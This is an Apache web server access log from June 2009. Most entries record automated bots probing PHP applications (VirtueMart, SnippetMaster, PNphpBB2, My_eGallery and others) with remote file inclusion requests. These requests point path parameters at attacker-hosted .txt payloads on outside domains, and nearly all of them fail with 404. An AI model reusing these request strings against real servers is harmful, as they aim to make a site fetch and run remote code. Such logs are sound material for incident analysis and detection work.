122.201.76.100 - - [08/Jun/2009:01:26:13 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:26:13 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:26:14 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
209.59.12.99 - - [08/Jun/2009:01:26:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.201.76.100 - - [08/Jun/2009:01:26:16 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
65.98.59.178 - - [08/Jun/2009:01:26:19 -0400] "GET /logs/access_log.Q109052100//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:01:26:24 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:26:24 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:26:35 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:26:35 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:26:36 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:26:38 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
82.146.39.200 - - [08/Jun/2009:01:26:57 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.822"
82.146.39.200 - - [08/Jun/2009:01:26:57 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.822"
82.146.39.200 - - [08/Jun/2009:01:26:57 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.822"
121.165.73.157 - - [08/Jun/2009:01:27:09 -0400] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:01:27:09 -0400] "GET /logs/access_log.Q109052100//modules/coppermine/themes/default/theme.php?THEME_DIR=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:01:27:09 -0400] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:01:27:11 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:27:12 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:27:12 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:27:39 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:27:39 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:27:40 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:27:51 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
61.250.85.200 - - [08/Jun/2009:01:27:51 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:01:27:51 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:01:27:51 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:01:27:51 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:27:52 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
91.184.52.8 - - [08/Jun/2009:01:28:24 -0400] "GET /logs/access_log.Q109052100//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:01:28:30 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:28:30 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:28:32 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
119.93.90.155 - - [08/Jun/2009:01:29:09 -0400] "GET /logs/access_log.Q109052200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unescoulsan.org/bbs//data/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
119.93.90.155 - - [08/Jun/2009:01:29:10 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unescoulsan.org/bbs//data/safe1.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
119.93.90.155 - - [08/Jun/2009:01:29:15 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unescoulsan.org/bbs//data/safe1.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
203.185.28.194 - - [08/Jun/2009:01:29:16 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:01:30:02 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:01:30:02 -0400] "GET /logs/access_log.Q109052100%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:01:30:02 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
58.177.251.221 - - [08/Jun/2009:01:30:12 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
203.185.28.194 - - [08/Jun/2009:01:30:13 -0400] "GET /logs/error_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.177.251.221 - - [08/Jun/2009:01:30:35 -0400] "GET /logs/error_log.Q109041400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
121.165.73.157 - - [08/Jun/2009:01:30:58 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:01:30:58 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:01:30:58 -0400] "GET /logs/access_log.Q109052100//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
119.93.90.155 - - [08/Jun/2009:01:31:29 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.unescoulsan.org/bbs//data/safe1.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
119.93.90.155 - - [08/Jun/2009:01:31:30 -0400] "GET /errors.php?error=http://www.unescoulsan.org/bbs//data/safe1.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
119.93.90.155 - - [08/Jun/2009:01:31:30 -0400] "GET /logs/errors.php?error=http://www.unescoulsan.org/bbs//data/safe1.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
82.146.39.200 - - [08/Jun/2009:01:32:08 -0400] "GET /logs/access_log.Q109053000//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.822"
87.106.67.146 - - [08/Jun/2009:01:32:46 -0400] "GET /logs/access_log.Q109052600%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:01:32:57 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
121.165.73.157 - - [08/Jun/2009:01:32:58 -0400] "GET /logs/access_log.Q109052600//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:01:33:11 -0400] "GET /logs/access_log.Q109052100//includes/db_connect.php//includes/db_adodb.php?baseDir=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:01:33:11 -0400] "GET //includes/db_connect.php//includes/db_adodb.php?baseDir=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:01:33:11 -0400] "GET /logs//includes/db_connect.php//includes/db_adodb.php?baseDir=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:01:33:23 -0400] "GET /logs/error_log.Q109041400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:33:30 -0400] "GET /logs/error_log.Q109041400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:33:31 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
91.184.52.8 - - [08/Jun/2009:01:33:59 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:33:59 -0400] "GET /logs/access_log.Q109053100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:33:59 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:34:03 -0400] "GET /logs/access_log.Q109052200//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:01:34:08 -0400] "GET /logs/access_log.Q109052200//includes/db_connect.php//includes/db_adodb.php?baseDir=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:34:23 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:34:23 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
122.173.252.182 - - [08/Jun/2009:01:34:27 -0400] "GET / HTTP/1.1" 200 409 "-" "-"
203.185.28.194 - - [08/Jun/2009:01:35:13 -0400] "GET /logs/error_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.6.22.170 - - [08/Jun/2009:01:35:13 -0400] "GET /logs/error_log.Q109052700 HTTP/1.0" 200 2005412 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.170 - - [08/Jun/2009:01:35:17 -0400] "GET /logs/error_log.Q109052700 HTTP/1.0" 200 2005412 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.14 - - [08/Jun/2009:01:36:00 -0400] "GET /logs/error_log.Q108071700 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.184.52.8 - - [08/Jun/2009:01:36:23 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:23 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:23 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:23 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:24 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:24 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:24 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:24 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:25 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:25 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:25 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:25 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:35 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:36 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:36 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:36 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:36 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:36 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:40 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:40 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:40 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:36:40 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.6.22.170 - - [08/Jun/2009:01:36:46 -0400] "GET /logs/error_log.Q109050700 HTTP/1.0" 200 276616 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.170 - - [08/Jun/2009:01:36:47 -0400] "GET /logs/error_log.Q109050700 HTTP/1.0" 200 276616 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.184.52.8 - - [08/Jun/2009:01:37:05 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:37:05 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
61.100.183.125 - - [08/Jun/2009:01:37:10 -0400] "GET //includes/class_item.php?fileExtension=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
61.100.183.125 - - [08/Jun/2009:01:37:10 -0400] "GET /logs//includes/class_item.php?fileExtension=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:01:37:42 -0400] "GET /logs/access_log.Q109052100//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:01:38:15 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:01:38:15 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:01:38:15 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:01:38:15 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:38:17 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:38:17 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:38:17 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:38:20 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:38:20 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:38:20 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:38:20 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:38:21 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:01:38:21 -0400] "GET /logs/access_log.Q109050300%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:01:38:21 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:01:38:21 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:01:38:26 -0400] "GET /logs/access_log.Q108121900%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
58.177.251.221 - - [08/Jun/2009:01:38:36 -0400] "GET /logs/access_log.Q109052100//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:01:38:36 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:01:38:37 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
91.184.52.8 - - [08/Jun/2009:01:39:30 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:39:30 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:39:30 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:39:30 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:01:39:36 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
